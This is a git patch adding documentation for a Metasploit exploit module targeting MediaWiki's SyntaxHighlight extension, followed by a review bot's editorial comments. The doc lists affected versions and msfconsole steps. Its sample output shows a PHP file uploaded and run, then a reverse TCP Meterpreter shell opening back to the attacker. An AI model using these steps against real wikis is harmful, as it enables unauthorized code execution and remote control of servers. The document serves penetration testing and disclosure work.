From 0eb79e8c8cdc9b2fef61ca8cab3f1dc93de79b77 Mon Sep 17 00:00:00 2001 From: Yorick Koster Date: Sat, 29 Apr 2017 16:14:25 +0200 Subject: [PATCH] Added docs for mediawiki_syntaxhighlight.rb --- .../multi/http/mediawiki_syntaxhighlight.md | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md diff --git a/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md b/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md new file mode 100644 index 0000000000..3fceaa9f79 --- /dev/null +++ b/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md 
@@ -0,0 +1,30 @@ +## Vulnerable Application + + Any MediaWiki installation with SyntaxHighlight version 2.0 installed & enabled. This extension ships with the AIO package of MediaWiki 1.27.x & 1.28.x. This issue was supposed to be fixed in MediaWiki version 1.28.1 and version 1.27.2. It appears that the fix was pushed to the git repository, but for some reason it was not included in the release packages. + +## Verification Steps + + 1. `use exploit/multi/http/mediawiki_syntaxhighlight` + 2. `set RHOST ` + 3. `set TARGETURI ` + 4. `set UPLOADPATH ` + 5. optionally set `RPORT`, `SSL`, and `VHOST` + 6. `exploit` + 7. **Verify** a new Meterpreter session is started + +## Sample Output + +``` +msf > use exploit/multi/http/mediawiki_syntaxhighlight +msf exploit(mediawiki_syntaxhighlight) > set RHOST 192.168.146.137 +RHOST => 192.168.146.137 +msf exploit(mediawiki_syntaxhighlight) > set TARGETURI /mediawiki +TARGETURI => /mediawiki +msf exploit(mediawiki_syntaxhighlight) > exploit + +[*] Started reverse TCP handler on 192.168.146.197:4444 +[*] Local PHP file: images/bwpqtiqgmeydivskjcjltnldb.php +[*] Trying to run /mediawiki/images/bwpqtiqgmeydivskjcjltnldb.php +[*] Sending stage (33986 bytes) to 192.168.146.137 +[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.137:55768) at 2017-04-29 14:27:03 +0200 +``` \ No newline at end of file
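Review bot: In Verification Steps, items 2 to 4 (`set RHOST `, `set TARGETURI `, `set UPLOADPATH `) carry no value or placeholder, so the reader cannot tell what each option expects. Please add a short description of each value, keeping any angle-bracket placeholder inside the backticks so a Markdown renderer does not drop it. `UPLOADPATH` is listed as a step but is never set in the Sample Output, where the run reports `Local PHP file: images/...`. If the option has a default, say so and mark step 4 as optional alongside step 5; otherwise add it to the sample session. The Vulnerable Application paragraph says the fix "was supposed to be" in 1.28.1 and 1.27.2 but "for some reason" was not in the release packages. It would help to state which release packages were actually tested and found affected, so readers can tell whether their installed version is covered. The file also ends without a trailing newline.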